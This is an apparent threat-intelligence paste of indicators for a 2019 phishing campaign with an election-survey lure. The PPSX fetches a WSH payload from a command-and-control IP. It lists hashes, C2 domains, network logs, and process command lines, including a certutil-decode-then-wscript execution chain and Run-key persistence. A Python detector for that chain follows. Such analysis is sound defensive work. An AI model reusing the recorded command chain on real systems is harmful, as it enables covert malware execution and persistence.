VRad

#xml_wsh_280319

Mar 29th, 2019
#IOC #OptiData #VR #APT #XML_RELS #WSH #EXE_Less #Recon

https://pastebin.com/kiSbFi36

attack_vector
--------------
email attach .ZIP > .PPSX > XML_RELS > GET > WSH > %temp%\tmp4E07.tmp > %userprofile%\NTUSR.DAT

email_headers
--------------
Received: from o1.31pqt.s2shared.stmpendgrid.net ([167.89.100.227])
Received: by filter0029p3iad2.sendgrid.net
Received: from OTQ2MjY1Mw (host-94-103-82-136.hosted-by-vdsina.ru [94.103.82.136]) by ismtpd0007p1lon1.sendgrid.net
Date: Thu, 28 Mar 2019 12:46:31 +0000 (UTC)
From: socis@socis.kiev.ua
To: user00@victim01
Subject: ПРЕС-РЕЛІЗ ЗА РЕЗУЛЬТАТАМИ СОЦІОЛОГІЧНОГО ДОСЛІДЖЕННЯ «ПРЕЗИДЕНТСЬКІ ВИБОРИ 2019-БЕРЕЗЕНЬ»

files
--------------
SHA-256 30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72
File name Prezent_UA_2k_berezen_PRESS.ppsx [Microsoft PowerPoint 2007+]
File size 391.03 KB (400418 bytes)

SHA-256 360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f
File name wj5yuxmp.hmf [XML document, ASCII text, with very long lines, with CRLF]
File size 272.7 KB (279242 bytes)

SHA-256 09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b
File name tmp4E07.tmp [ASCII text, with very long lines, with no line terminators]
File size 270.93 KB (277430 bytes)

SHA-256 85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3
File name NTUSR.DAT [ASCII text, with very long lines, with no line terminators]
File size 203.19 KB (208070 bytes)

activity
**************

PL_SCR = C2 = 185.176.43.94

netwrk
--------------
185.176.43.94 socis.cf GET /wj5yuxmp.hmf HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;)
185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)

comp
--------------
POWERPNT.EXE 2844 TCP localhost 49232 185.176.43.94 80 ESTABLISHED
wscript.exe 1104 TCP localhost 49224 185.176.43.94 80 ESTABLISHED

proc
--------------
C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE /s C:\Users\operator\Desktop\Prezent_UA_2k_berezen_PRESS.ppsx

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT && timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT

C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT
C:\Windows\system32\timeout 10

C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
C:\Windows\System32\wscript.exe" //B //E:vbs "C:\Users\operator\NTUSR.DAT
C:\Windows\System32\cmd.exe" /c mode con cp select=65001 | systeminfo > C:\tmp\radB50A0.tmp
C:\Windows\system32\mode.com con cp select=65001
C:\Windows\system32\systeminfo.exe

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29.03.2019 12:23
(Default) c:\users\operator\ntusr.dat 29.03.2019 12:23
wscript.exe //B //E:vbs "C:\Users\operator\NTUSR.DAT"

drop
--------------
%temp%\tmp4E07.tmp
%userprofile%\NTUSR.DAT

# # #
https://www.virustotal.com/gui/file/30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72/details
https://www.virustotal.com/gui/file/360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f/details
https://www.virustotal.com/gui/file/09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b/details
https://www.virustotal.com/gui/file/85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3/details
https://urlscan.io/result/83a3366e-12ee-4a6c-a326-a8eb19bc77c7

VR
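Detection logic for the certutil -decode > wscript //E:vbs chain recorded in the proc and persist sections, as an added example (Python, not part of the original paste). The sample events are constructed from the command lines above; the benign certutil and wscript events 4 and 5 are assumptions added for contrast.

```python
import ntpath
import re

# Constructed sample process-creation command lines, modelled on the "proc" section
# above (events 1-3) plus two assumed benign uses of the same binaries (events 4-5).
SAMPLE_EVENTS = [
    (1, r"C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT "
        r"&& timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT"),
    (2, r"C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT"),
    (3, r"C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT"),
    (4, r"C:\Windows\system32\certutil -verify C:\certs\corp.cer"),    # benign certutil use
    (5, r"C:\Windows\system32\wscript.exe C:\Scripts\logon.vbs"),       # benign, .vbs extension
]

SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
CERTUTIL_DECODE = re.compile(
    r'certutil(?:\.exe)?\s+(?:\S+\s+)*?-decode(?:hex)?\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)', re.I)
WSH_HOST = re.compile(r'\b[wc]script(?:\.exe)?"?\s', re.I)


def certutil_decode_output(cmd):
    """Output path of a certutil -decode invocation, or None when cmd is not one."""
    m = CERTUTIL_DECODE.search(cmd)
    return m.group(2).strip('"') if m else None


def wsh_forced_engine_target(cmd):
    """Script path when wscript/cscript is forced onto an engine with //E: and the file
    does not carry a script extension (here a .DAT); None otherwise."""
    if not WSH_HOST.search(cmd) or not re.search(r"//E:", cmd, re.I):
        return None
    path = re.findall(r'"[^"]+"|\S+', cmd)[-1].strip('"')   # script path is the last token
    return path if ntpath.splitext(path)[1].lower() not in SCRIPT_EXT else None


def decode_then_execute(events):
    """Correlate a certutil -decode output file with a later WSH execution of that file.
    Returns (decode_event_id, execute_event_id, path) tuples, keyed on the first decode."""
    decoded, hits = {}, []
    for eid, cmd in events:
        out = certutil_decode_output(cmd)
        if out:
            decoded.setdefault(out.lower(), eid)
        target = wsh_forced_engine_target(cmd)
        if target and target.lower() in decoded:
            hits.append((decoded[target.lower()], eid, target))
    return hits


if __name__ == "__main__":
    for hit in decode_then_execute(SAMPLE_EVENTS):
        print("decode event %d -> execute event %d: %s" % hit)
```

The same `wsh_forced_engine_target` check applies to Run-key values such as the one in the persist section, since the value is just another command line.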